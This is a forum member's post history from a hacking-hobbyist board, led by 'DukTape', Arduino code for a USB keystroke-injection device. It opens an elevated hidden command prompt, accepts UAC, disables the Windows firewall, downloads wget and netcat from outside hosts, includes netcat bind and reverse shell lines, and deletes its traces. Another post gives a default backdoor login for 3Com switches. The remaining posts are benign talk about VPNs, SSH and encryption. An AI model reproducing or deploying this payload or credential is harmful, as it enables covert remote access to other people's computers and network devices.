Jump to content

str33ts0ld13r

Active Members
 View Profile  See their activity

  • Posts

    51

  • Joined

  • Last visited

 Content Type 

Posts posted by str33ts0ld13r

    [win] Duktape

    in Classic USB Rubber Ducky

    Posted · Edited by str33ts0ld13r

    Greetings ducky lovers! Im very excited to finally be making a contribution to the rubber ducky project.

    To get started you will need arduino and the phukdlib.

    DukTape is nothing fancy (pun intended :lol: ). It will get you wget and a few other toys like nc then it opens a back door for you to get in. When complete it blinks (big surprise right!! haha) There is MUCH room for improvement on this but I sadly haven't had time to work on this as much as I would like.. Anyway I wanted to share what I have put together so far. Please feel free to modify, add, change what ever you like in this code. All that I ask is that you post you changes for the rest of the ducky community. As always constructive criticism is welcome and appreciated.

    Warning: I have NOT had a chance to test this code with my teensy yet (had some hardware failure on my test boxes :( ). But it compiles fine for me.

    Warning2: I haven't set up a kill switch feature yet to keep it from running on systems you dont want it to (ie your own system). So you have been warned, it runs every time you plug it in!

    UPDATE: I just added a UAC handler and changed the way the cmd is launched to go through the start menu using ctrl and esc keys. (thanks H@L0_F00 for the ctrl esc combo you posted) and (thanks Jonny_Walked I used some of the code you posted, UAC handler, and used your cmd launcher)(If this code was Benownzu93's I thank you). Also the PHUCKED lib is no longer needed with the updated cmd launcher.

    /*
################################
###########DukTape##############
################################

Readme:
To use DukTape make sure you have
the phukdlib installed in arduino.

I would like to thank everyone on
the Rubber Ducky forums http://www.hak5.org/forums/index.php?showforum=56
who I borrowed ideas and code from.

Debug is done through the serial monitor.
To disable it comment out/remove the code
marked as debug (ie.. //debug).

Delays may need to be adjusted...
*/

int ledPin = 11;

void setup()
{
  delay(5000); //initial delay
  pinMode(ledPin, OUTPUT); 

    Serial.begin(9600); //debug
    delay(200);           //debug
    Serial.println("START");//debug

  //start cmd hidden
  CMD();
  delay(1000);
  MoveWin();

  //prepare work area
  TypeCmd("mkdir %systemroot%\\winduk");
  TypeCmd("cd %systemroot%\\winduk");
  TypeCmd("netsh firewall set opmode disable");//kill firewall

  //ftp download wget
  TypeCmd("echo bin >>ftpcmd.txt");
  TypeCmd("echo cd /tex-archive/systems/texlive/tlnet/tlpkg/installer/wget/ >>ftpcmd.txt");
  TypeCmd("echo get wget.exe >>ftpcmd.txt");
  TypeCmd("echo quit >>ftpcmd.txt");
  TypeCmd("ftp -A -v -s:ftpcmd.txt cam.ctan.org"); //run ftp download
  delay(6000);
  TypeCmd("if NOT exist wget.exe ftp -A -v -s:ftpcmd.txt cam.ctan.org");//error recovery in case of wget download fail

    Serial.println("Ftp completed");//debug

  //Get more tools
  TypeCmd("if NOT exist unzip.exe wget -q http://stahlworks.com/dev/unzip.exe"); //get unzip
  TypeCmd("if NOT exist nircmd.zip wget -q http://www.nirsoft.net/utils/nircmd.zip");//get nircmd
  TypeCmd("if NOT exist nircmdc.exe unzip.exe -qq nircmd.zip"); //unzip nircmd
  TypeCmd("if NOT exist nc111nt.zip wget -q http://joncraton.org/media/files/nc111nt.zip"); //get netcat
  TypeCmd("if NOT exist nc.exe unzip.exe -qq nc111nt.zip nc.exe");//unzip netcat

  //Payload
  //TypeCmd("nc -l -p 1337 -d -e cmd.exe");//netcat listens on port leet and launches cmd when a connection is established
  /*TypeCmd("nc -d IP PORT -e cmd.exe");/*reverse netcat replace IP with your ipaddress and replace PORT with the port you use
  on the system you want to connect back to, run "nc -l -p PORT" without the quotes on your system to accept the reverse connection*/

  //clean up
  TypeCmd("if Exist nircmdc.exe del /Q nircmd.zip");
  TypeCmd("if EXIST ftpcmd.txt del /Q ftpcmd.txt");
  TypeCmd("if EXIST nc111nt.zip del /Q nc111nt.zip");
  TypeCmd("exit");//close cmd.
    Serial.println("ALL DONE!");//debug
}

void loop()                     
{
  digitalWrite(ledPin, HIGH);// LED on
  delay(500);
  digitalWrite(ledPin, LOW);// LED off
  delay(500);
}

void Enter()
{
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(100);
}

void TypeCmd(char *commandtotype)
{
  //must have cmd prompt open to work
  Keyboard.println("*commandtotype");
  delay(200);
  Enter();
  delay(2000);//Execution delay
    Serial.println("*commandtotype");//debug
}

void MoveWin()
{
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.set_key1(KEY_SPACE);
  Keyboard.set_key2(KEY_M);
  Keyboard.send_now();
  delay(50);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.set_key2(0);
  Keyboard.send_now();
  delay(50);
  for(int x=0; x<200; ++x){
    Keyboard.set_key1(KEY_UP);
    Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(100);
   }
   Enter();
}

void UAC()
{
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.set_key1(KEY_Y);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

void CMD()
{
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.set_key1(KEY_ESC);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  Keyboard.print("cmd");
  delay(1000);
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(2000);
  UAC();
}

    The Attack Pre-Installed Environment

    in USB Hacks

    Posted

    thats sweet man. ive been playing with it in a VM for a few hours. i haven't had any problems with it. a few suggestions i could make would be to add cain & able (i know its a tool that is looked down upon but there is no denying that it dose have a lot of useful features) maybe wireshark. i like how the UI is real simple and not cluttered with things that you dont need. im really looking forward to the future releases! if i can help with anything pm me.

    SSH mini tunnle

    in Questions

    Posted

    you can just get a free shell account from somewhere that allows ssh (most do) and tunnel through that. what i use for my tunnels is my hp server LC2000 (i know its ancient but it works for me plus it was free). you always do have the option of just taking one of the junk computers you probably have laying around and putting linux on it. ubuntu is really really easy to set up, then just connect it to your network and run it headless. thats usually a cheap way. if you dont have a crapo machine laying around, garage sales are usually a good place to find one.

    Brute force via serial modem null cable

    in Security

    Posted

    starchfish: for the 3com firmware 7.0.1 and 8.1.1 (you should be able to get the firmware here if you dont have it infodeli.3com.com) there is a back door login of debug with the password synnet just telnet in. its a major security flaw that they put in that you should probably fix once you get your switches back up..

    Hak5 VPN

    in Community Projects

    Posted

    exactly the way i feel is if they are willing to lean i dont mind helping them. but ya we all have those people that we cant stand.. yours is steve jobs mine is pretty much all sys-admin/IT departments

    but the one that we can all agree on are those little internet punks.. (im sure im gonna get flamed for that IT comment (for all you flamers the key words in that sentence were "pretty much"))

    Hak5 VPN

    in Community Projects

    Posted

    Yeah trusting strangers is hard. Perhaps make it invite only with invitees to supply verifiable data (address phone number, license number or something) but even then i don't know. I totally love the concept, but will the wannabe zero cool losers be able control themselves?

    ya skiddies are a pain in the ass (i mean ill defend noobs because they haven't had the chance to lean yet but skiddies don't want to learn.). i like the invite only thing a registration would be one of the best security measures we could take. (note:everyone who helps contribute to this project will have access to the hak5 vpn before anyone else is invited). registrations will be included in this thank you for that input Swathe.

    I was thinking of adding a wrapper around the original OpenVPN...

    that would be sweet. encryption is always good..

    sorry to everyone i haven't been able to do as much with this project as i would like. i have a few other projects that have been taking up a considerable amount of my time, but not to worry those projects are just about wrapped up and i will be able to focus more of my time to this. i hope to really get things moving on this in the next week or so. now to just make sure everyone is in agreement, we are going with openvpn....?..

    problem with ssh

    in Security

    Posted

    ok first off you dont have to port forward your router unless you are connecting to your lan from the outside internet (ie.. coffee shop wifi connection back through your router to you ssh server). what client are you using? are you trying to run your sshd on your laptop and connect to it through the loopback adapter (ie.. 127.0.0.1) or are you running your sshd on a separate machine?

    Hak5 VPN

    in Community Projects

    Posted

    A while ago i was thinking of creating a Hamachi clone based on OpenVPN, but never had time to get it started.

    that would be pretty sweet to add any features that hamachi has that openvpn is missing. if you can code that would be great, im not much good when it comes to coding. what were you thinking of adding??

    This has come up quite a bit through the past years. It all comes down to "would you really be willing to join a vpn with a bunch of "hackers". A vpn with complete strangers.

    thats why we have to find a way to make it as secure as possible, your only line of defense shouldnt be your router firewall. i agree that there are a lot of security risks involved and that is one of my main concerns.. seeing as how it has come up before there is an interest in it, and i think that there is a way to make it work securely.

    Leaf VPN - anyone use it?

    in Questions

    Posted

    Yea i heard that in the show too looks internesting.. i think your right... leaf is too zero conf (not enough features)

    open vpn looks good but im concerend it maybe a little feature packed and complicated to setup for people with less knowlege of this kinda thing??

    to be perfectly honest i have never done anything with a vpn before this. but the way i feel is that people need to learn things and shouldn't use a weaker product because its easier. plus this will be a community project so there will be plenty of help for people that have question.

    I have tried Hamachi and OpenVPN, and i prefer OpenVPN, cause i have more control over my connections. In some enviromenst i need to setup a VPN connection behind a firewall, but with hamachi you have to pay to get a decent speed, while with OpenVPN i noticed only 20% speed drop.

    well speed is key especial with gaming. thank you bit hunter for that information. control over your connections is important when it comes to security.

    i think that with everything that we know now we should go with openvpn. plus there is the fact that the hak5 crew are suppose to feature somethings on it in a future ep. sense this is a community project i created a new thread in projects>community projects labeled Hak5 vpn (link to it http://hak5.org/forums/index.php?showtopic=11914)

    so lets move all discussion over there.

    Hak5 VPN

    in Community Projects

    Posted

    i started this thread to move discussion of the hak5 vpn out of the questions section where it started. i will update this first post with all the information that is needed for this project. please make your comments in this thread instead of the thread in questions.

    Folder Encryption

    in Questions

    Posted

    obviously you want to use multiple layers of cryptography and hidden volumes for your data but there needs to be a legit reason for your data being there and consuming that much space. as SomethingToChatWith said it by renaming it a doc file it wont open in simple editors but if your going through this much work already your opponent wont be using wordpad. the answer to this is rare formats that consume lots and lots of space. and you can always hide it in a .rar file then tuck then in an iso or something.. encryption is just a game of hide and seek.

    Episode 4x25 - USB Device Tracking and PFsense

    in Hak5

    Posted

    great episode guys, the pfSense part was great really would like to see some more on that and secure/networking in general. it definitely looks like the hacksaw crew has their work cut out for them after the usb device tracking segment. this was truly a great episode. by the way Darren and Matt where can i get what you guys were smoking before the show?? that ending segment with you guys had me rolling on the floor it was great!!! :lol:

×
×
  • Create New...